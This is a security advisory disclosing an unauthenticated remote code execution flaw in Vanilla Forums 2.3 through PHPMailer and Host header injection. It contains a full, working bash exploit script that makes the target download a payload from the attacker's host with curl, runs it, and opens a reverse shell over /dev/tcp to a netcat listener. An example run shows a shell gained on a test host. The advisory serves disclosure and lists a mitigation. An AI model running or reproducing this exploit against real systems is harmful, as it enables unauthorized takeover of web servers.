============================================= - Discovered by: Dawid Golunski - dawid[at]legalhackers.com - https://legalhackers.com - CVE-2016-10033 - Release date: 11.05.2017 - Revision 1.0 - Severity: Critical ============================================= I. VULNERABILITY ------------------------- Vanilla Forums <= 2.3 Unauth. Remote Code Execution (RCE) exploit CVE-2016-10033 [0day] II. BACKGROUND ------------------------- "Community Forums Reinvented Create an online community that your customers will love. Vanilla's forum software is used by top brands to engage customers, drive loyalty and reduce support costs." "Vanilla provides cloud and open source community forum software that powers discussion forums worldwide with close to 1M downloads. Built for flexibility and integration, Vanilla is the best, most powerful community solution in the world." https://vanillaforums.com/en/software/ https://open.vanillaforums.com/ III. INTRODUCTION ------------------------- Vanilla Forums software (including the latest stable version of 2.3 in its default configuration) is affected by: * Remote Code Execution CVE-2016-10033 (0day) which can be exploited by unauthenticated remote attackers to execute arbitrary code and fully compromise the target application when combined with Host Header injection vulnerability CVE-2016-10073 (described in a separate advisory). IV. DESCRIPTION ------------------------- As described in the advisory of CVE-2016-10073: The HOST header is used to form the sender email address as we can see in the following snippet of code: ------[ library/core/class.email.php ]------ ... public function from($SenderEmail = '', $SenderName = '', $bOverrideSender = false) { if ($SenderEmail == '') { $SenderEmail = c('Garden.Email.SupportAddress', ''); if (!$SenderEmail) { $SenderEmail = 'noreply@'.Gdn::request()->host(); } } if ($SenderName == '') { $SenderName = c('Garden.Email.SupportName', c('Garden.Title', '')); } if ($this->PhpMailer->Sender == '' || $bOverrideSender) { $this->PhpMailer->Sender = $SenderEmail; } ob_start(); $this->PhpMailer->setFrom($SenderEmail, $SenderName, false); ob_end_clean(); return $this; } ... ----------------------------------------- In default configuration of Vanilla the address is then passed to the phpmailer library as the sender address in the line: $this->PhpMailer->Sender = $SenderEmail; The official stable version 2.3 available at: https://open.vanillaforums.com/addon/vanilla-core-2.3 is bundled with PHPMailer library in version 5.1: -----[ library/vendors/phpmailer/class.phpmailer.php ]---- <?php /*~ class.phpmailer.php | Software: PHPMailer - PHP email class | Version: 5.1 ---------------------------------------------------------- This version of PHPMailer is affected by the: * PHPMailer < 5.2.18 Remote Code Execution (CVE-2016-10033) vulnerability also discovered by the author of this advisory and described in detail at: https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html Similarly to recently disclosed exploit of WordPress Core 4.6 RCE: https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html remote attackers may exploit the phpmailer vulnerability in Vanilla Forums by passing the payload (additional parameters to /usr/sbin/sendmail) within the HOST header. For example, the following web request: --- POST /vanilla2-3/entry/passwordrequest HTTP/1.1 Host: vanilla-forums-vhost -X Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Connection: close Content-Length: 149 hpt=&Target=discussions&ClientHour=2017-05-10+22%3A00&Email=admin&Request+a+new+password=Request+a+new+password&DeliveryType=VIEW&DeliveryMethod=JSON --- would inject -X parameter at the end of the argument list passed to /usr/bin/sendmail : Arg no. 0 == [/usr/sbin/sendmail] Arg no. 1 == [-t] Arg no. 2 == [-i] Arg no. 3 == [-oi] Arg no. 4 == [-f] Arg no. 5 == [noreply@attackers_server] Arg no. 6 == [-X] NOTE: It should be noted that this vulnerability can still be exploited even if Vanilla software is hosted on Apache web server with several name-based vhosts enabled, and despite not being the default vhost. This is possible as the attacker can take advantage of HTTP/1.0 protocol and specify the exact vhost within the URL. This will allow the HOST header to be set to arbitrary value as the Apache server will obtain the SERVER_NAME from the provided URL. This will ensure that the malicious request will reach the affected code despite invalid vhost within the HOST header. To demonstrate, the above web request could be simply modified to: --- POST http://vanilla-forums-vhost/vanilla2-3/entry/passwordrequest HTTP/1.1 Host: arbitrary-string -X --- to achieve the same effect on a host with multiple vhosts. V. PROOF OF CONCEPT EXPLOIT ------------------------- ---[ vanilla-forums-rce-exploit.sh ]--- #!/bin/bash # # __ __ __ __ __ # / / ___ ____ _____ _/ / / / / /___ ______/ /_____ __________ # / / / _ \/ __ `/ __ `/ / / /_/ / __ `/ ___/ //_/ _ \/ ___/ ___/ # / /___/ __/ /_/ / /_/ / / / __ / /_/ / /__/ ,< / __/ / (__ ) # /_____/\___/\__, /\__,_/_/ /_/ /_/\__,_/\___/_/|_|\___/_/ /____/ # /____/ # # # Vanilla Forums <= 2.3 Remote Code Execution (RCE) PoC Exploit 0day # Core version (no plugins, default config.) # # CVE-2016-10033 (RCE) # CVE-2016-10073 (Header Injection) # # vanilla-forums-rce-exploit.sh (ver. 1.0) # # # Discovered and coded by # # Dawid Golunski # https://legalhackers.com # https://twitter.com/dawid_golunski # # ExploitBox project: # https://ExploitBox.io # # # Exploit code: # https://exploitbox.io/exploit/vanilla-forums-rce-exploit.sh # # Full advisory URL: # https://exploitbox.io/vuln/Vanilla-Forums-Exploit-RCE-0day-Remote-Code-Exec-CVE-2016-10033.html # # # Related advisories: # https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html # https://exploitbox.io/vuln/Vanilla-Forums-Exploit-Host-Header-Injection-CVE-2016-10073-0day.html # # White-paper 'Pwning PHP mail() function For Fun And RCE' # https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html # # # Usage: # ./vanilla-forums-rce-exploit.sh target-forum-url reverse_shell_ip # # Tested on: # Vanilla Core 2.3 # https://open.vanillaforums.com/addon/vanilla-core-2.3 # # Disclaimer: # For testing purposes only # # # ----------------------------------------------------------------- # # Interested in vulnerabilities/exploitation? # # # .;lc' # .,cdkkOOOko;. # .,lxxkkkkOOOO000Ol' # .':oxxxxxkkkkOOOO0000KK0x:' # .;ldxxxxxxxxkxl,.'lk0000KKKXXXKd;. # ':oxxxxxxxxxxo;. .:oOKKKXXXNNNNOl. # '';ldxxxxxdc,. ,oOXXXNNNXd;,. # .ddc;,,:c;. ,c: .cxxc:;:ox: # .dxxxxo, ., ,kMMM0:. ., .lxxxxx: # .dxxxxxc lW. oMMMMMMMK d0 .xxxxxx: # .dxxxxxc .0k.,KWMMMWNo :X: .xxxxxx: # .dxxxxxc .xN0xxxxxxxkXK, .xxxxxx: # .dxxxxxc lddOMMMMWd0MMMMKddd. .xxxxxx: # .dxxxxxc .cNMMMN.oMMMMx' .xxxxxx: # .dxxxxxc lKo;dNMN.oMM0;:Ok. 'xxxxxx: # .dxxxxxc ;Mc .lx.:o, Kl 'xxxxxx: # .dxxxxxdl;. ., .. .;cdxxxxxx: # .dxxxxxxxxxdc,. 'cdkkxxxxxxxx: # .':oxxxxxxxxxdl;. .;lxkkkkkxxxxdc,. # .;ldxxxxxxxxxdc, .cxkkkkkkkkkxd:. # .':oxxxxxxxxx.ckkkkkkkkxl,. # .,cdxxxxx.ckkkkkxc. # .':odx.ckxl,. # .,.'. # # Subscribe at: # # https://ExploitBox.io # # https://twitter.com/Exploit_Box # # ----------------------------------------------------------------- intro=" DQobWzBtIBtbMjFDG1sxOzM0bSAgICAuO2xjJw0KG1swbSAbWzIxQxtbMTszNG0uLGNka2tPT09r bzsuDQobWzBtICAgX19fX19fXxtbOEMbWzE7MzRtLiwgG1swbV9fX19fX19fG1s1Q19fX19fX19f G1s2Q19fX19fX18NCiAgIFwgIF9fXy9fIF9fX18gG1sxOzM0bScbWzBtX19fXBtbNkMvX19fX19c G1s2Q19fX19fX19cXyAgIF8vXw0KICAgLyAgXy8gICBcXCAgIFwvICAgLyAgIF9fLxtbNUMvLyAg IHwgIFxfX19fXy8vG1s3Q1wNCiAgL19fX19fX19fXz4+G1s2QzwgX18vICAvICAgIC8tXCBfX19f IC8bWzVDXCBfX19fX19fLw0KIBtbMTFDPF9fXy9cX19fPiAgICAvX19fX19fX18vICAgIC9fX19f X19fPg0KIBtbNkMbWzE7MzRtLmRkYzssLDpjOy4bWzlDG1swbSxjOhtbOUMbWzM0bS5jeHhjOjs6 b3g6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eG8sG1s1QxtbMG0uLCAgICxrTU1NMDouICAuLBtb NUMbWzM0bS5seHh4eHg6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eHhjG1s1QxtbMG1sVy4gb01N TU1NTU1LICBkMBtbNUMbWzM0bS54eHh4eHg6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eHhjG1s1 QxtbMG0uMGsuLEtXTU1NV05vIDpYOhtbNUMbWzM0bS54eHh4eHg6DQobWzM3bSAbWzZDLhtbMTsz NG1keHh4eHhjG1s2QxtbMG0ueE4weHh4eHh4eGtYSywbWzZDG1szNG0ueHh4eHh4Og0KG1szN20g G1s2Qy4bWzE7MzRtZHh4eHh4YyAgICAbWzBtbGRkT01NTU1XZDBNTU1NS2RkZC4gICAbWzM0bS54 eHh4eHg6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eHhjG1s2QxtbMG0uY05NTU1OLm9NTU1NeCcb WzZDG1szNG0ueHh4eHh4Og0KG1szN20gG1s2QxtbMTszNG0uZHh4eHh4YxtbNUMbWzBtbEtvO2RO TU4ub01NMDs6T2suICAgIBtbMzRtJ3h4eHh4eDoNChtbMzdtIBtbNkMbWzE7MzRtLmR4eHh4eGMg ICAgG1swbTtNYyAgIC5seC46bywgICAgS2wgICAgG1szNG0neHh4eHh4Og0KG1szN20gG1s2Qxtb MTszNG0uZHh4eHh4ZGw7LiAuLBtbMTVDG1swOzM0bS4uIC47Y2R4eHh4eHg6DQobWzM3bSAbWzZD G1sxOzM0bS5keHh4eCAbWzBtX19fX19fX18bWzEwQ19fX18gIF9fX19fIBtbMzRteHh4eHg6DQob WzM3bSAbWzdDG1sxOzM0bS4nOm94IBtbMG1cG1s2Qy9fIF9fX19fX19fXCAgIFwvICAgIC8gG1sz NG14eGMsLg0KG1szN20gG1sxMUMbWzE7MzRtLiAbWzBtLxtbNUMvICBcXBtbOEM+G1s3QzwgIBtb MzRteCwNChtbMzdtIBtbMTJDLxtbMTBDLyAgIHwgICAvICAgL1wgICAgXA0KIBtbMTJDXF9fX19f X19fXzxfX19fX19fPF9fX18+IFxfX19fPg0KIBtbMjFDG1sxOzM0bS4nOm9keC4bWzA7MzRtY2t4 bCwuDQobWzM3bSAbWzI1QxtbMTszNG0uLC4bWzA7MzRtJy4NChtbMzdtIA0K" function prep_host_header() { cmd="$1" rce_cmd="\${run{$cmd}}"; # replace / with ${substr{0}{1}{$spool_directory}} #sed 's^/^${substr{0}{1}{$spool_directory}}^g' rce_cmd="`echo $rce_cmd | sed 's^/^\${substr{0}{1}{\$spool_directory}}^g'`" # replace ' ' (space) with #sed 's^ ^${substr{10}{1}{$tod_log}}$^g' rce_cmd="`echo $rce_cmd | sed 's^ ^\${substr{10}{1}{\$tod_log}}^g'`" #return "target(any -froot@localhost -be $rce_cmd null)" host_header="target(any -froot@localhost -be $rce_cmd null)" return 0 } echo "$intro" | base64 -d if [ "$#" -ne 2 ]; then echo -e "Usage:\n$0 target-forum-url reverse_shell_ip\n" exit 1 fi target="$1" rev_host="$2" echo -e ' \e[44m| ExploitBox.io |\e[0m' echo -e " \e[94m+ --=|\e[0m \e[91m Vanilla Forums <= 2.3 Unauth. RCE Exploit \e[0m \e[94m|\e[0m" #sleep 1s echo -e "\e[94m+ --=|\e[0m \e[94m|\e[0m \e[94m+ --=|\e[0m Discovered & Coded By \e[94m|\e[0m \e[94m+ --=|\e[0m \033[94mDawid Golunski\033[0m \e[94m|\e[0m \e[94m+ --=|\e[0m \033[94mhttps://legalhackers.com\033[0m \e[94m|\e[0m \e[94m+ --=|\e[0m \033[94m@dawid_golunski\033[0m \e[94m|\e[0m \e[94m+ --=|\e[0m \e[94m|\e[0m \e[94m+ --=|\e[0m \"With Great Power Comes Great Responsibility\" \e[94m|\e[0m \e[94m+ --=|\e[0m \e[91m*\e[0m For testing purposes only \e[91m*\e[0m \e[94m|\e[0m " echo -ne "\e[91m[*]\033[0m" read -p " Sure you want to get a shell on the target '$target' ? [y/N] " choice echo if [ "$choice" == "y" ]; then echo -e "\e[92m[*]\033[0m Guess I can't argue with that... Let's get started...\n" #sleep 2s #sleep 2s # Host payload on :80 RCE_exec_cmd="(sleep 5s && nohup bash -i >/dev/tcp/$rev_host/1337 0<&1 2>&1) &" echo "$RCE_exec_cmd" > rce.txt python -mSimpleHTTPServer 80 2>/dev/null >&2 & hpid=$! # POST data string data='hpt=&Target=discussions&Email=admin&Request+a+new+password=Request+a+new+password&DeliveryType=VIEW&DeliveryMethod=JSON' # Save payload on the target in /tmp/rce cmd="/usr/bin/curl -o/tmp/rce $rev_host/rce.txt" prep_host_header "$cmd" curl -H"Host: $host_header" -0 -s -i -d "$data" $target/entry/passwordrequest | grep -q "200 OK" if [ $? -ne 0 ]; then echo "[!] Failed conecting to the target URL. Exiting" exit 2 fi echo -e "\e[92m[+]\033[0m Connected to the target" echo -e "\n\e[92m[+]\e[0m Payload sent successfully" sleep 2s # Execute payload (RCE_exec_cmd) on the target /bin/bash /tmp/rce cmd="/usr/bin/nohup /bin/bash /tmp/rce" prep_host_header "$cmd" #echo -e "Host Payload2: \nHost: $host_header" curl -H"Host: $host_header" -s -0 -i -d "$data" $target/entry/passwordrequest >/dev/null 2>&1 & echo -e "\n\e[92m[+]\033[0m Payload executed!" echo -e "\n\e[92m[*]\033[0m Waiting for the target to send us a \e[94mreverse shell\e[0m...\n" nc -vv -l 1337 #killall python echo else echo -e "\e[92m[+]\033[0m Responsible choice ;) Exiting.\n" exit 0 fi #kill -9 $hpid echo "Exiting..." exit 0 ---[ EOF ]--- Video PoC ~~~~~~~~~~~ Example run ~~~~~~~~~~~~ # ./vanilla-forums-rce-exploit.sh http://xenial//vanilla2-3/ 192.168.57.1 .;lc' .,cdkkOOOko;. _______ ., ________ ________ _______ \ ___/_ ____ '___\ /_____\ _______\_ _/_ / _/ \\ \/ / __/ // | \_____// \ /_________>> < __/ / /-\ ____ / \ _______/ <___/\___> /________/ /_______> .ddc;,,:c;. ,c: .cxxc:;:ox: .dxxxxo, ., ,kMMM0:. ., .lxxxxx: .dxxxxxc lW. oMMMMMMMK d0 .xxxxxx: .dxxxxxc .0k.,KWMMMWNo :X: .xxxxxx: .dxxxxxc .xN0xxxxxxxkXK, .xxxxxx: .dxxxxxc lddOMMMMWd0MMMMKddd. .xxxxxx: .dxxxxxc .cNMMMN.oMMMMx' .xxxxxx: .dxxxxxc lKo;dNMN.oMM0;:Ok. 'xxxxxx: .dxxxxxc ;Mc .lx.:o, Kl 'xxxxxx: .dxxxxxdl;. ., .. .;cdxxxxxx: .dxxxx ________ ____ _____ xxxxx: .':ox \ /_ ________\ \/ / xxc,. . / / \\ > < x, / / | / /\ \ \_________<_______<____> \____> .':odx.ckxl,. .,.'. | ExploitBox.io | + --=| Vanilla Forums <= 2.3 Unauth. RCE Exploit | + --=| | + --=| Discovered & Coded By | + --=| Dawid Golunski | + --=| https://legalhackers.com | + --=| @dawid_golunski | + --=| | + --=| "With Great Power Comes Great Responsibility" | + --=| * For testing purposes only * | [*] Sure you want to get a shell on the target 'http://xenial//vanilla2-3/' ? [y/N] y [*] Guess I can't argue with that... Let's get started... [+] Connected to the target [+] Payload sent successfully [+] Payload executed! [*] Waiting for the target to send us a reverse shell... Listening on [0.0.0.0] (family 0, port 1337) Connection from [192.168.57.3] port 1337 [tcp/*] accepted (family 2, sport 51744) bash: cannot set terminal process group (5243): Inappropriate ioctl for device bash: no job control in this shell www-data@xenial:/$ id id uid=33(www-data) gid=33(www-data) groups=33(www-data) www-data@xenial:/$ whoami whoami www-data www-data@xenial:/$ exit exit exit Exiting... VI. BUSINESS IMPACT ------------------------- Upon a successfull exploitation, a remote unauthenticated attacker could remotely execute arbitrary code on the target and fully compromise the application / system on which the application is hosted. VII. SYSTEMS AFFECTED ------------------------- The latest stable release of Vanilla Forums available at the official website: https://open.vanillaforums.com/addon/vanilla-core-2.3 was confirmed to be vulnerable. Previous versions are also likely to be vulnerable. VIII. SOLUTION ------------------------- This vulnerability was reported to Vanilla Forums support team in December 2016 however it has remained unpatched for over 5 months. As there has been no progress in this case , this advisory is finally released to the public without an official patch. As a quick mitigation (before updating the affected PHPMailer library), users can pre-set the support email (sender's address) to a static value to prevent the dynamic creation of the email address / the use of the HOST header. IX. REFERENCES ------------------------- https://legalhackers.com https://ExploitBox.io https://twitter.com/Exploit_Box Vendor site: https://vanillaforums.com Confirmed vulnerable stable version of Vanilla Forums 2.3: https://open.vanillaforums.com/addon/vanilla-core-2.3 https://open.vanillaforums.com/discussion/32822/vanilla-2-3-is-now-available Video PoC: https://www.youtube.com/watch?v=8tWfWjfhZWU PoC exploit code URL: https://exploitbox.io/exploit/vanilla-forums-rce-exploit.sh Related advisories / white-papers: https://exploitbox.io/vuln/Vanilla-Forums-Exploit-Host-Header-Injection-CVE-2016-10073-0day.html https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10045-Vuln-Patch-Bypass.html https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html X. CREDITS ------------------------- Discovered by Dawid Golunski dawid (at) legalhackers (dot) com https://legalhackers.com https://ExploitBox.io XI. REVISION HISTORY ------------------------- 11.05.2017 - Advisory released, rev. 1 XII. LEGAL NOTICES ------------------------- The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information.
